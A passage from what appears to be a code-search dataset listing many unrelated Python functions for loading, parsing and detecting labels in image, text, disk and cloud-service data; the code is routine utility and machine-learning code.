classification is found return\n return None", "def get_label(img_path):\n img_name = img_path.stem\n label_name = img_name + \".txt\"\n label_path = img_path.parent / label_name\n with open(label_path) as f:\n label = json.load(f)\n return label", "def get_label_counts(dataset_path: str):\n if not dataset_path:\n return None\n td = ImageFolder(root=dataset_path)\n # get label distribution\n label_counts = [0] * len(td.classes)\n for p, l in td.samples:\n label_counts[l] += 1\n return label_counts", "def load_labels(path):\n with open(path, 'r', encoding='utf-8') as f:\n lines = f.readlines()\n labels = []\n for row_number, content in enumerate(lines):\n pair = re.split(r'[:\\s]+', content.strip(), maxsplit=1)\n #if len(pair) == 2 and pair[0].strip().isdigit():\n labels.append(np.array([int(pair[0].strip()),pair[1].strip()]))\n #else:\n # labels.append(pair[0].strip())\n return np.array(labels)", "def get_labels():\n return [name for name in os.listdir(os.getcwd() + '/assets/images') if name != 'test']", "def __read_image_paths_labels(self, annotations_csv_path):\n\n # intialize some list objects\n\n \n temp_df = pd.read_csv(annotations_csv_path, index_col=[0])\n labels = temp_df.drop('Path', axis=1).values\n image_paths = temp_df['Path'].tolist()\n\n return image_paths, labels", "def detect_labels(img: np.ndarray):\n \n # Create a range of allowed colors.\n lower_color = np.array([20, 50, 0])\n upper_color = np.array([255, 255, 255])\n\n # Keep the pixels that lie within the range.\n color_filtered = cv.inRange(\n cv.cvtColor(img, cv.COLOR_RGB2HSV),\n lower_color,\n upper_color\n )\n \n # Keeping only the really bright pixels (converted to 255), change the dull ones to 0.\n # Helps distinguish the labels from other dull colors.\n _, thresholded = cv.threshold(color_filtered, 254, 255, cv.THRESH_BINARY)\n\n # Reduce the thickness of regions. 
Every 30x30 sliding window of 255 in the image gets replaced by a white pixel.\n # The stronger the erosion, the more the noise is removed, with a chance of removal of good pixels as well.\n eroded = cv.erode(thresholded, np.ones((30, 30)))\n\n # Now find outlines of the bright regions that remain after the thickness reduction.\n contours, _ = cv.findContours(eroded, cv.RETR_TREE, cv.CHAIN_APPROX_SIMPLE)\n \n # Identify the contours that represent our labels.\n # Gotta be the two largest ones in terms of area.\n contour_areas = [(cv.contourArea(c), idx) for (idx, c) in enumerate(contours)]\n\n contour_largest_idx = max(contour_areas)[1]\n contour_second_largest_idx = max(filter(lambda item: item[1] != contour_largest_idx, contour_areas))[1]\n\n # Since the labels are sorta rectangular, find the mean of the contours' y-axes to approximate the vertical center of the labels.\n largest_vertical_center = np.mean(contours[contour_largest_idx][:, :, 1])\n second_largest_vertical_center = np.mean(contours[contour_second_largest_idx][:, :, 1])\n\n # Higher center implies the value is more towards the bottom of the image, and hence the vertical center of the bottom label.\n bottom_label = min(largest_vertical_center, second_largest_vertical_center)\n \n # Lower center implies the value is more towards the top of the image, and hence the vertical center of the top label.\n top_label = max(largest_vertical_center, second_largest_vertical_center)\n\n return bottom_label, top_label", "def test_text_classifier_get_labels(self):\n pass", "def get_base_image_from_labels(user_disk):\n\n labels = ['cf_version', 'branch', 'target', 'build_id']\n disk_labels = user_disk.extra['labels']\n\n if all(label in disk_labels for label in labels):\n cf_version = disk_labels['cf_version']\n branch = disk_labels['branch']\n target = disk_labels['target']\n build_id = disk_labels['build_id']\n\n base_image = f'halyard-{cf_version}-{branch}-{target}-{build_id}'\n return base_image\n else:\n utils.fatal_error(f'Labels for {user_disk.name} are not complete.\\n \\\n Must have all labels in: {labels}')", "def detect_rk_labels(image, img_size, s3bucket):\n\n accepted_image_types = ['jpg', 'JPG', 'png', 'PNG']\n rekognition_img_size_limit = 15 * 1024 * 1024\n\n try:\n if str(image).split('/')[-1].split('.')[-1] in accepted_image_types \\\n and float(img_size) < rekognition_img_size_limit:\n\n rk_client = boto3.client('rekognition', region_name=AWS_REGION)\n\n labels = []\n\n resp = rk_client.detect_labels(\n Image={\n 'S3Object': {\n 'Bucket': s3bucket,\n 'Name': image,\n },\n },\n MaxLabels=5,\n MinConfidence=80,\n )\n\n for i_list in resp['Labels']:\n labels.append({'Name': i_list['Name'], 'Confidence': int(i_list['Confidence'])})\n\n return labels\n else:\n print(\"Labels detection skipped for {} because of service constraints violation\".format(image))\n\n except Exception as e:\n print(\"Rekognition labels detection skipped because of the following error: \", e)\n pass", "def labels_for_training_data():\n current_id = 0\n label_ids = dict()\n faces, faces_ids = list(), list()\n\n # Go through directories and find label and path to image\n for root, dirs, files in walk('data/'):\n for file in files:\n if file.endswith('.jpg') or file.endswith('.png'):\n img_path = path.join(root, file)\n label = path.basename(root).replace(' ', '-').lower()\n if label not in label_ids:\n label_ids[label] = current_id\n current_id += 1\n id_ = label_ids[label]\n\n test_img = cv2.imread(img_path)\n test_img = cv2.cvtColor(test_img, 
cv2.COLOR_BGR2GRAY)\n if test_img is None:\n print('Image not loaded properly')\n continue\n\n faces.append(test_img)\n faces_ids.append(id_)\n\n # Make directory with labels doesn't exist make directory and file with labels\n if not path.exists('labels/'):\n makedirs('labels/')\n with open('labels/face-labels.pickle', 'wb') as file:\n pickle.dump(label_ids, file)\n\n return faces, faces_ids", "def getImageLabels(bucket, key):\n client = boto3.client('rekognition')\n resp = client.detect_labels(\n Image={\n 'S3Object': {\n 'Bucket': bucket,\n 'Name': key\n }\n }\n )\n\n output = []\n # I'm assuming that we only need the name labels to return to the customer. \n for label in resp['Labels']:\n output.append(label['Name'])\n return output", "def load_labels(source_dir, label_pattern):\r\n\r\n logging.info(\"Loading labels from %s with pattern %s\"\r\n % (source_dir, label_pattern))\r\n label_files = glob(path.join(source_dir, label_pattern))\r\n if len(label_files) == 0:\r\n raise ValueError(\"No label files found with pattern %s\"\r\n % label_pattern)\r\n if len(label_files) > 1:\r\n raise ValueError(\"Only one label file supported ATM.\")\r\n labels = np.load(label_files[0]).flatten()\r\n logging.info(\"Label loading complete. Shape is %r\" % (labels.shape,))\r\n return labels", "def _read_labels(test_data=False):\n if not test_data:\n filename = os.path.join(FOLDER_PATH, 'train-labels.idx1-ubyte')\n else:\n filename = os.path.join(FOLDER_PATH, 't10k-labels.idx1-ubyte')\n if not os.path.exists(filename):\n raise ValueError('The file dose not exist.')\n \n # Create a queue that produces the filenames to read.\n filename_queue = tf.train.string_input_producer([filename])\n \n # The first 8 bytes contain file information:\n # [offset] [type] [value] [description]\n # 0000 32 bit integer 0x00000801(2049) magic number\n # 0004 32 bit integer 60000/10000 number of items \n # ...(label value)\n header_bytes = 8\n # Every record consists of a label, with a fixed number of bytes for each.\n record_bytes = 1\n \n # Create a FixedLengthRecordReader to read record.\n reader = tf.FixedLengthRecordReader(record_bytes=record_bytes,\n header_bytes=header_bytes)\n _, value = reader.read(filename_queue)\n\n # Convert from a string to a vector of uint8, then cast to int32.\n record = tf.cast(tf.decode_raw(value, tf.uint8), tf.int32)\n \n # Reshape from [1] to a scalar shape [].\n label = tf.reshape(record, [])\n\n return label", "def subbrick_labels_of(path_to_afni_dataset) -> List[str]:\n dataset = nibabel.load(path_to_afni_dataset)\n raw_label_string = dataset.header.info['BRICK_LABS']\n labels = raw_label_string.split(\"~\")\n\n return labels", "def get_label_files(path, ext=\".txt\"):\n return get_files(path, ext)", "def get_labels(fasta_file):\n\t\tbase_name = basename(fasta_file)\n\t\tname = splitext(base_name)[0]\n\t\tlabel = name.split(\"_\")[-1]\n\t\tassert label == \"pos\" or label == \"hard\", \"AssertionError: label {} not found, possible labels pos, hard.\"\n\t\tif label == \"pos\":\n\t\t\treturn \"Toxin\"\n\t\telif label == \"hard\":\n\t\t\treturn \"No_toxin\"", "async def test__get_labels():\n # Uppercase 'C'\n assert ImageConfig._get_labels(json.loads('{\"Config\":{\"Labels\":{\"x\":\"5\"}}}')) == {\n \"x\": \"5\"\n }\n\n # Lowercase 'C'\n assert ImageConfig._get_labels(json.loads('{\"config\":{\"Labels\":{\"x\":\"5\"}}}')) == {\n \"x\": \"5\"\n }\n\n # Missing 'Labels'\n assert ImageConfig._get_labels(json.loads('{\"Config\":{}}')) == {}", "def __get_label(file_path, fruits):\n try:\n root, 
name, fruit, location, time, filename = r\"{}\".format(file_path).split(\"\\\\\")\n if fruit.lower() not in fruits:\n return \"Unknown fruit\"\n return fruit.lower()\n except ValueError:\n for fruit in fruits:\n if fruit in file_path.lower():\n return fruit\n\n return \"Unknown fruit\" # if we got here so we don't know what is the label", "def make_label_map(path, label_list):\r\n \r\n img = []\r\n for name in path:\r\n now = np.zeros((224,224))\r\n im = cv2.resize(cv2.imread(name), (224,224)).tolist()\r\n for y, i in enumerate(im):\r\n for x, j in enumerate(i):\r\n try:\r\n now[y, x] = label_list.index(j)\r\n\r\n except ValueError:\r\n now[y, x] = 0\r\n\r\n img.append(now)\r\n return img", "def load_labels(filename):\n return [line.rstrip() for line in tf.gfile.GFile(filename)]", "def load_labels(filename):\n return [line.rstrip() for line in tf.gfile.GFile(filename)]", "def count_labels(labels_path):\n counts = np.zeros(4)\n with open(labels_path, 'r') as f:\n for line in f:\n line = int(line.split()[1]) - 1\n counts[line] += 1\n\n return counts", "def load_labels(filename):\n return [line.rstrip() for line in tf.gfile.GFile(filename)]", "def label_names_file():\n return tfds.core.tfds_path(_LABELS_FNAME)", "def get_validation_labels(val_path):\n labels_path = tfds.core.tfds_path(_VALIDATION_LABELS_FNAME)\n with tf.io.gfile.GFile(os.fspath(labels_path)) as labels_f:\n # `splitlines` to remove trailing `\\r` in Windows\n labels = labels_f.read().strip().splitlines()\n with tf.io.gfile.GFile(val_path, 'rb') as tar_f_obj:\n tar = tarfile.open(mode='r:', fileobj=tar_f_obj)\n images = sorted(tar.getnames())\n return dict(zip(images, labels))", "def storing_labels (self, fpath_geojson):\n \n labels_df = gpd.read_file (fpath_geojson)\n print(\"Size and shape of the labels dataset are: {}\".format(labels_df.shape))\n return labels_df", "def _get_images_and_labels(self, path: str, user_id: int):\n\n image_paths = [os.path.join(path, f) for f in os.listdir(path)]\n face_samples = []\n ids = []\n\n for imagePath in image_paths:\n\n pil_image = Image.open(imagePath).convert('L') # convert it to grayscale\n img_numpy = np.array(pil_image, 'uint8')\n\n faces = self.detector.detectMultiScale(img_numpy)\n\n for (x, y, w, h) in faces:\n face_samples.append(img_numpy[y:y + h, x:x + w])\n ids.append(user_id)\n\n return face_samples, ids", "def is_gcs_path(path):\n return GCS_REGEX.match(path)", "def parse_labelfile(path):\n with open(path, \"r\") as FILE:\n lines = FILE.readlines()\n\n\n labels = {x.split(\":\")[0]: x.split(\":\")[1] for x in lines[1:]}\n\n for key in labels:\n labels[key] = np.array(labels[key].split(\",\")).astype(\"uint8\")\n\n return labels", "def detect(self, path):\n valid = False\n path = pathlib.Path(path)\n # basic check for suffix\n try:\n if path.suffix == self.suffix:\n valid = True\n except ValueError:\n pass\n\n # advanced check with \"detect\"\n if valid and \"detect\" in self.recipe:\n fdetect = self.recipe[\"detect\"]\n valid = fdetect(path)\n\n return valid", "def _GetLabels(self, directory, scan_subdirs, label, predicate):\n\n labels = []\n\n # Go through all of the files (and subdirectories) in that\n # directory.\n for entry in dircache.listdir(directory):\n entry_label = self._GetLabelFromBasename(entry)\n # If the label is not valid then pretend it\n # does not exist. 
It would not be valid to create an entity\n # with such an id.\n if not self.IsValidLabel(entry_label):\n continue\n # Compute the full path to 'entry'.\n entry_path = os.path.join(directory, entry)\n # If it satisfies the 'predicate', add it to the list.\n if predicate(entry_path):\n labels.append(self.JoinLabels(label, entry_label))\n # If it is a subdirectory, recurse.\n if (scan_subdirs and os.path.isdir(entry_path)\n and self._IsSuiteFile(entry_path)):\n labels.extend(self._GetLabels(entry_path,\n scan_subdirs,\n self.JoinLabels(label, \n entry_label),\n predicate))\n\n return labels", "def get_label_vocab(*paths: str) -> Dict[str, int]:\n label_set = set()\n for path in paths:\n with open(path) as r:\n for line in r:\n instance = json.loads(line)\n for annotation in instance['annotations']:\n label_set.update(annotation['labels'])\n return {label: idx for idx, label in enumerate(label_set)}", "def test_label():\n label_path = pjoin(data_path, \"label\", \"lh.BA1.label\")\n label = read_label(label_path)\n # XXX : test more\n assert_true(np.all(label > 0))", "def load_labeled_data():\n\n images = []\n labels = []\n\n for i in range(1, 10):\n path = (\"selflabeled\", str(i), \"*.jpg\")\n filenames = glob.glob(\"/\".join(path))\n images_one_type = [cv2.imread(img) for img in filenames]\n labels_one_type = [i] * len(images_one_type)\n images += images_one_type\n labels += labels_one_type\n\n return images, labels", "def read_labels(labels_file):\n if not labels_file:\n print 'WARNING: No labels file provided. Results will be difficult to interpret.'\n return None\n\n labels = []\n with open(labels_file) as infile:\n for line in infile:\n label = line.strip()\n if label:\n labels.append(label)\n assert len(labels), 'No labels found'\n return labels", "def read_labels(label_path, label_type, calib_path=None, is_velo_cam=False, proj_velo=None):\n if label_type == \"txt\": #TODO\n places, size, rotates = read_label_from_txt(label_path)\n if places is None:\n return None, None, None\n rotates = np.pi / 2 - rotates\n dummy = np.zeros_like(places)\n dummy = places.copy()\n if calib_path:\n places = np.dot(dummy, proj_velo.transpose())[:, :3]\n else:\n places = dummy\n if is_velo_cam:\n places[:, 0] += 0.27\n\n elif label_type == \"xml\":\n bounding_boxes, size = read_label_from_xml(label_path)\n places = bounding_boxes[30][\"place\"]\n rotates = bounding_boxes[30][\"rotate\"][:, 2]\n size = bounding_boxes[30][\"size\"]\n\n return places, rotates, size", "def read_labels(label_path, label_type, calib_path=None, is_velo_cam=False, proj_velo=None):\n if label_type == \"txt\": #TODO\n places, size, rotates = read_label_from_txt(label_path)\n if places is None:\n return None, None, None\n rotates = np.pi / 2 - rotates\n dummy = np.zeros_like(places)\n dummy = places.copy()\n if calib_path:\n places = np.dot(dummy, proj_velo.transpose())[:, :3]\n else:\n places = dummy\n if is_velo_cam:\n places[:, 0] += 0.27\n\n elif label_type == \"xml\":\n bounding_boxes, size = read_label_from_xml(label_path)\n places = bounding_boxes[30][\"place\"]\n rotates = bounding_boxes[30][\"rotate\"][:, 2]\n size = bounding_boxes[30][\"size\"]\n\n return places, rotates, size", "def sort_have_labels(doc_cloud_id):\n filename = SETTINGS.LABELED_LOCATION + \"/\" + doc_cloud_id\n if os.path.isfile(filename):\n return 0\n return 1", "def _findfile(self,path,label):\n files=[];filenames=os.listdir(path)\n for name in filenames:\n if os.path.splitext(name)[0]==str(label):\n files.append(name)\n return files", "def 
_read_labels_csv_file(self, csv_file_path, image_file_paths):\n\n self.__logger.debug('[Get Labels]')\n self.__logger.debug('Read CSV Labels ( %s ) ...' % csv_file_path)\n\n image_file_names = self.get_file_names_from_file_paths(file_paths=image_file_paths)\n\n labels = []\n\n with open(csv_file_path, newline='') as csvfile:\n read_image_files = 0 # numbers of image files read\n rows = csv.reader(csvfile)\n\n for row in rows:\n file_name = row[0]\n # make file name from '00030183_004.png' to '00030183_004'\n file_name = file_name.split('.')\n file_name = file_name[0]\n\n # if csv file name matches image file name, the label of the former will be stored in labels (list)\n if file_name == image_file_names[read_image_files]: # image_file_name has to remove str '.jpg'\n label = row[1].split('|')\n label_id = []\n for i in range(len(label)):\n label_id.append(Xray_class_id[label[i]])\n labels.append(label_id) # store the label\n\n read_image_files += 1\n if read_image_files == len(image_file_names): # if numbers of image files read equals numbers of\n # batch images, then break\n break\n\n self.__logger.debug('Done !')\n\n return labels", "def cifar100(path, label_mode='fine'):\n def _load_batch(filepath, label_key):\n with open(filepath, 'rb') as f:\n if sys.version_info < (3,):\n d = cPickle.load(f)\n else:\n d = cPickle.load(f, encoding='bytes')\n d_decoded = {} # decode utf8\n for k, v in six.iteritems(d):\n d_decoded[k.decode('utf8')] = v\n d = d_decoded\n images = d['data']\n labels = d[label_key]\n images = images.reshape(images.shape[0], 3, 32, 32)\n labels = np.reshape(labels, len(labels,))\n return images, labels\n path = os.path.expanduser(path)\n directory = 'cifar-100-python'\n if not os.path.exists(os.path.join(path, directory)):\n url = 'http://www.cs.toronto.edu/~kriz/cifar-100-python.tar.gz'\n maybe_download_and_extract(path, url)\n\n filepath = os.path.join(path, directory, 'train')\n x_train, y_train = _load_batch(filepath, label_mode + '_labels')\n\n filepath = os.path.join(path, directory, 'test')\n x_test, y_test = _load_batch(filepath, label_mode + '_labels')\n return (x_train, y_train), (x_test, y_test)", "def get_labels(train_f_path):\n results = []\n with open(train_f_path, 'r') as f:\n for line in f:\n n_line = line.strip()\n if n_line:\n results.append(n_line.split()[0])\n return results", "def read_labels(labels_path):\n with open(labels_path, 'r') as file:\n data = file.read()\n data = data.split()\n data = np.array(data)\n data = np.reshape(data, (-1, 2))\n return data", "def test_intent_classifier_get_labels(self):\n pass", "def read_stanford_labels():\n # First get the hardi data\n fetch_stanford_hardi()\n hard_img, gtab = read_stanford_hardi()\n\n # Fetch and load\n files, folder = fetch_stanford_labels()\n labels_file = pjoin(folder, \"aparc-reduced.nii.gz\")\n labels_img = nib.load(labels_file)\n return hard_img, gtab, labels_img", "def get_disk_labels(self):\n path = '/dev/disk/by-label/'\n labels = {}\n if not os.path.isdir(path):\n return labels\n\n for label in os.listdir(path):\n label = label.replace('\\\\x2f', '/')\n device = os.path.realpath(path + '/' + label)\n labels[device] = label\n\n return labels", "def extract_labels(filename,tag,one_hot):\n print('Extracting labels',filename)\n return extractdb_labels(filename,tag,one_hot=one_hot)", "def object_detect(filename):\n cv2.ocl.setUseOpenCL(False)\n just_fname = filename.split(\".\")[0]\n image = cv2.imread('./static/uploads/' + filename)\n bbox, label, conf = cv.detect_common_objects(image)\n 
output_image = draw_bbox(image, bbox, label, conf)\n plt.imshow(output_image)\n plt.savefig(os.path.join('./static/output/', just_fname + '.png'))\n d = Counter(label)\n if not label:\n return \"No objects detected\"\n labelstr = \", \".join('{} {}'.format(v, k) for k, v in d.items())\n return labelstr", "def _is_label(self, words):\n if words[0] == 'label':\n if len(words) != 2:\n raise SyntaxError(\"File line {}: Invalid number of arguments for C_LABEL command.\".format(self._file_line))\n return True\n else:\n return False", "def compute_localizations_labels(depc, loc_id_list, config=None):\n from os.path import exists, join\n\n logger.info('[ibs] Process Localization Labels')\n logger.info('config = {!r}'.format(config))\n # Get controller\n ibs = depc.controller\n\n if config['labeler_algo'] in ['pipeline', 'cnn']:\n gid_list_, gid_list, chip_list = get_localization_chips(\n ibs,\n loc_id_list,\n target_size=(128, 128),\n axis_aligned=config['labeler_axis_aligned'],\n )\n result_list = ibs.generate_chip_label_list(chip_list, **config)\n elif config['labeler_algo'] in ['azure']:\n raise NotImplementedError('Azure is not implemented for images')\n elif config['labeler_algo'] in ['densenet']:\n from wbia.algo.detect import densenet\n\n target_size = (\n densenet.INPUT_SIZE,\n densenet.INPUT_SIZE,\n )\n gid_list_, gid_list, chip_list = get_localization_chips(\n ibs,\n loc_id_list,\n target_size=target_size,\n axis_aligned=config['labeler_axis_aligned'],\n )\n config = dict(config)\n config['classifier_weight_filepath'] = config['labeler_weight_filepath']\n nonce = ut.random_nonce()[:16]\n cache_path = join(ibs.cachedir, 'localization_labels_{}'.format(nonce))\n assert not exists(cache_path)\n ut.ensuredir(cache_path)\n chip_filepath_list = []\n for index, chip in enumerate(chip_list):\n chip_filepath = join(cache_path, 'chip_%08d.png' % (index,))\n cv2.imwrite(chip_filepath, chip)\n assert exists(chip_filepath)\n chip_filepath_list.append(chip_filepath)\n result_gen = densenet.test_dict(chip_filepath_list, return_dict=True, **config)\n result_list = list(result_gen)\n ut.delete(cache_path)\n\n assert len(gid_list) == len(result_list)\n\n # Release chips\n chip_list = None\n\n # Group the results\n group_dict = {}\n for gid, result in zip(gid_list, result_list):\n if gid not in group_dict:\n group_dict[gid] = []\n group_dict[gid].append(result)\n\n # Return the results\n for gid in gid_list_:\n result_list = group_dict.get(gid, None)\n if result_list is None:\n ret_tuple = (\n np.array([]),\n np.array([]),\n np.array([]),\n np.array([]),\n np.array([]),\n [],\n )\n else:\n zipped_list = list(zip(*result_list))\n ret_tuple = (\n np.array(zipped_list[0]),\n np.array(zipped_list[1]),\n np.array(zipped_list[2]),\n np.array(zipped_list[3]),\n np.array(zipped_list[4]),\n list(zipped_list[5]),\n )\n yield ret_tuple", "def _check_for_labels(self):\n check = True\n if 'labels' not in self.mapper:\n check = False\n return check", "def get_labels():\n\n logging.info(\"Getting metadata about labels\")\n\n labels = []\n\n if len(args.labels) == 0:\n logging.warning(\"No labels specified, assuming all labels. 
If you have a lot of labels in your inbox you could hit API limits quickly.\")\n results = GMAIL_CLIENT.users().labels().list(userId='me').execute()\n\n labels = results.get('labels', [])\n else:\n logging.info('Using labels: %s ', args.labels)\n\n for label in args.labels:\n labels.append({'id': label})\n\n if not labels:\n logging.info('No labels found.')\n sys.exit()\n\n return labels", "def find_label(self, *args):\n return _ida_hexrays.cfunc_t_find_label(self, *args)", "def load_labels(path, encoding='utf-8'):\r\n with open(path, 'r', encoding=encoding) as f:\r\n lines = f.readlines()\r\n if not lines:\r\n return {}\r\n\r\n if lines[0].split(' ', maxsplit=1)[0].isdigit():\r\n pairs = [line.split(' ', maxsplit=1) for line in lines]\r\n return {int(index): label.strip() for index, label in pairs}\r\n else:\r\n return {index: line.strip() for index, line in enumerate(lines)}", "def detect_hotdog(image_bytes):\n try:\n response = rekognition.detect_labels(\n Image={\n 'Bytes': image_bytes,\n },\n MinConfidence=80.0\n )\n except Exception as e:\n print(e)\n print('Unable to detect labels for image.')\n raise (e)\n labels = response['Labels']\n if any(label['Name'] == 'Hot Dog' for label in labels):\n return True\n return False", "def load_labels(db_dir, patient_id, flatten=True, unzipped=False):\n if unzipped:\n flat_labels = np.load(os.path.join(db_dir, '{:05d}_batched_lbls.npz'.format(patient_id)), allow_pickle=True)\n return flat_labels\n else:\n raw_labels = load_pkl(os.path.join(db_dir, '{:05d}_batched_lbls.pkl.gz'.format(patient_id)))\n if flatten:\n flat_labels = flatten_raw_labels(raw_labels)\n return flat_labels\n else:\n return raw_labels", "def assign_labels(basename, data_folder=Path(\"/data\"), verbose=False):\n urls_path = data_folder / \"graphs\" / basename / (basename + \".urls\")\n assert urls_path.exists(), \"Urls file not found!\"\n # check if labels dict already existing\n labels_path = data_folder / \"models\" / basename / (\"labels.json\")\n if labels_path.exists():\n print(\"Labels json already existing.\")\n else:\n print(\"Building labels json..\")\n # count number of lines in file\n num_lines = sum(1 for line in urls_path.open())\n labels_array = [0] * num_lines\n with urls_path.open() as f:\n clusters_count = Counter()\n labels = dict()\n class_index = 0\n for pos, line in enumerate(tqdm(f, total=num_lines)):\n # extract the TLD\n complete_domain = tldextract.extract(line).suffix\n # we only need the country domain now\n domain = complete_domain.split(\".\")[-1]\n # if domain unseen add it to class indices\n if domain not in labels:\n class_index += 1\n labels[domain] = class_index\n # assign label and add it to array\n y = labels[domain]\n labels_array[pos] = y\n clusters_count[domain] += 1\n labels_data = dict()\n # labels_data['labels'] = labels # do we really need this?\n labels_data['labels'] = {int(v): k for k, v in labels.items()}\n labels_data['count'] = clusters_count\n labels_data['array'] = labels_array\n if verbose:\n print(\"Found following labels:\")\n print(labels)\n with open(labels_path, 'w', encoding='utf-8') as outfile:\n json.dump(labels_data, outfile, ensure_ascii=False, indent=4)\n return labels_path", "def get_imagenet_classnames():\r\n return np.loadtxt(open(path_data+'/ilsvrc_2012_labels.txt'), dtype=object, delimiter='\\n')", "def __detect_objects_with_given_sight_from_img_path(self, labels, path, timeout):\n # Create the goal\n goalObjDetection = ObjectDetectionGoal()\n goalObjDetection.labels = labels\n goalObjDetection.path = path\n 
goalObjDetection.moveHead = False\n # Outputs\n state, result = self.__detectObjects(goalObjDetection, timeout)\n return state, result", "def load_labels(label_path):\r\n\r\n with open(label_path, \"r\") as f:\r\n\r\n lines = f.readlines()\r\n \r\n label = {}\r\n index = []\r\n for i, line in enumerate(lines):\r\n sp = line.split()\r\n label[sp[0]] = [int(sp[1]),int(sp[2]),int(sp[3])]\r\n index.append([int(sp[3]),int(sp[2]),int(sp[1])])\r\n\r\n return label, index", "def read(path, label2int):\n\n labels = [] # int labels\n samples = [] # examples as strings\n\n for label_dir in os.listdir(path):\n label_dir_path = os.path.join(path, label_dir)\n\n for file in os.listdir(label_dir_path):\n file_path = os.path.join(label_dir_path, file)\n file_text = open(file_path).read().rstrip()\n int_label = label2int[label_dir.lower()]\n samples.append(file_text)\n labels.append(int_label)\n\n return samples, labels", "def _label_loader(self, prefix):\n return self._base_loader(prefix, 'labels')", "def get_label_list():\n f_name = os.path.join(FLAGS.labels_dir, FLAGS.labels_name)\n if os.path.exists(f_name):\n with open(f_name, 'rb') as f:\n try:\n label_list = [line.rstrip('\\n') for line in f]\n except:\n print(\"Could not read file:\" + f_name)\n sys.exit()\n return label_list", "def dataset_files_labels(folders, db_root):\n fl = []\n for f in folders:\n\n fo = open(db_root + '/sample labels ' + f + '.txt', 'r')\n dialect = csv.Sniffer().sniff(fo.read(1024), delimiters=\"\\t \")\n fo.seek(0)\n for x in csv.reader(fo, dialect):\n fl.append([db_root + '/' + f + '/' + x[0], x[1]])\n return fl", "def label_training_data(input_path, output_path):\r\n import shutil\r\n image_files = [file for file in os.listdir(path=input_path) if '.JPG' in file or '.jpeg' in file]\r\n \r\n for file in image_files:\r\n file_input_path = os.path.join(input_path,file)\r\n \r\n img = cv2.imread(file_input_path)\r\n \r\n file_output_path = os.path.join(output_path, classify_face(img))\r\n \r\n try:\r\n os.makedirs(file_output_path)\r\n except FileExistsError:\r\n # directory already exists\r\n pass\r\n shutil.move(file_input_path, file_output_path)", "def retrieve_labels(file, label_indices):\n\n\t# Initialize numpy matrix to store the images\n\tlabels = np.zeros((len(label_indices), 10))\n\n\twith open(file, \"rb\") as f:\n\t\t# Intialize counters\n\t\ti = 0\n\t\tlabel_number = 0\n\n\t\t# Read first byte\n\t\tbyte = f.read(1)\n\n\t\t# Find each image in the data file\n\t\tfor label_index in label_indices:\n\t\t\t# Read in bytes until you arrive at the label\n\t\t\twhile byte and (i < (label_index + 8)):\n\t\t\t\tbyte = f.read(1)\n\t\t\t\ti += 1\n\n\t\t\t# Store label value in numpy array\n\t\t\tvalue = int.from_bytes(byte, \"big\")\n\t\t\tlabels[label_number] = np.zeros(10)\n\t\t\tlabels[label_number, value] = 1\n\n\t\t\t# Increment to next label\n\t\t\tlabel_number += 1\n\n\treturn labels", "def _common_label_scope(labels: list[str]) -> str:\n if not labels:\n return ''\n for i in range(len(labels[0]) - 1, -1, -1):\n if labels[0][i] == '/' and all(s.startswith(labels[0][:i + 1]) for s in labels):\n return labels[0][:i + 1]\n return ''", "def extract_labels(filename):\n print('Extracting', filename)\n with gzip.open(filename) as bytestream:\n bytestream.read(8)\n buf = bytestream.read(10000)\n labels = numpy.frombuffer(buf, dtype=numpy.uint8).astype(numpy.int64)\n return labels", "def store_labels(model_path, labels_dict, override=False):\n for i, value in enumerate(iter_partitions(model_path)):\n partition, count = value\n 
print(\"Partition: {}..\".format(i))\n labels = np.zeros(count, dtype=int)\n links = model_path / \"entity_names_link_{}.json\".format(i)\n with open(links, \"rt\") as tf:\n entities_list = json.load(tf)\n for pos, value in enumerate(tqdm(entities_list)):\n labels[pos] = labels_dict[int(value)]\n # save labels vector\n # TODO: infer the CORRECT name of embeddings\n h5_path = model_path / 'embeddings_link_{}.v50.h5'.format(i)\n try:\n h5f = h5py.File(h5_path, 'a')\n h5f.create_dataset('labels', data=labels, dtype=int)\n except RuntimeError:\n print(\"Labels already stored!\")\n if override:\n print(\"Overwriting new labels..\")\n h5f = h5py.File(h5_path, 'r+')\n data = h5f['labels']\n data[...] = labels\n h5f.close()", "def extract_labels(filename, num_images):\n filepath = os.path.join(WORK_DIRECTORY, filename)\n print('Extracting', filepath)\n with open(filepath, mode='rb') as bytestream:\n buf = bytestream.read(1 * num_images)\n labels = numpy.frombuffer(buf, dtype=numpy.uint8).astype(numpy.int64)\n return labels", "def get_detected_features_labels(img, detected_rects, label=-1, verbose=False):\n obj_rois = []\n for rect in detected_rects:\n try:\n (x, y, w, h) = rect\n except Exception as e:\n print(f\"The following error occurred when performing object detection for the image at {img_path}:\")\n print(e)\n x = None\n if verbose:\n print(*rect, sep=\", \")\n if isinstance(x, int):\n obj_rois.append(img[y:y+h, x:x+w])\n else:\n obj_rois.append(None)\n if label > -1:\n return obj_rois, [label] * len(obj_rois)\n else:\n return obj_rois", "def loadLabeled(self):\n\n maxNumChannels = self._maxNumChannels # 4\n\n baseFilePath, ext = os.path.splitext(self.path)\n baseFilePath = baseFilePath.replace('_ch1', '')\n baseFilePath = baseFilePath.replace('_ch2', '')\n\n # load mask\n #labeledPath = dvMaskPath + '_mask.tif'\n #labeledData = tifffile.imread(labeledPath)\n\n maskFromLabelGreaterThan = 0\n\n # load labeled\n for channelIdx in range(maxNumChannels):\n channelNumber = channelIdx + 1 # for _ch1, _ch2, ...\n stackListIdx = maxNumChannels + channelIdx # for index into self._stackList\n\n chStr = '_ch' + str(channelNumber)\n labeledPath = baseFilePath + chStr + '_labeled.tif'\n maskPath = baseFilePath + chStr + '_mask.tif'\n\n # if we find _labeeled.tif, load and make a mask\n # o.w. 
if we find _mask.tif then load that\n if os.path.isfile(maskPath):\n print(' bStack.loadLabeled() loading _mask.tif channelNumber:', channelNumber, 'maskPath:', maskPath)\n maskData = tifffile.imread(maskPath)\n self._stackList[stackListIdx] = maskData\n elif os.path.isfile(labeledPath):\n print(' bStack.loadLabeled() loading channelNumber:', channelNumber, 'labeledPath:', labeledPath)\n labeledData = tifffile.imread(labeledPath)\n self._stackList[stackListIdx] = labeledData > maskFromLabelGreaterThan\n else:\n # did not find _mask or _labeled file\n pass\n\n # erode _mask by 1 (before skel) as skel was getting mized up with z-collisions\n #self._dvMask = bimpy.util.morphology.binary_erosion(self._dvMask, iterations=2)\n\n # bVascularTracing.loadDeepVess() uses mask to make skel", "def get_predefined_labels(self):\n raise NotImplementedError", "def get_fnames_labels(root_dir, fpath, one_hot=False, skip_header=0, delimiter=','):\n data = np.genfromtxt(fpath, dtype=str, comments=None, delimiter=delimiter, 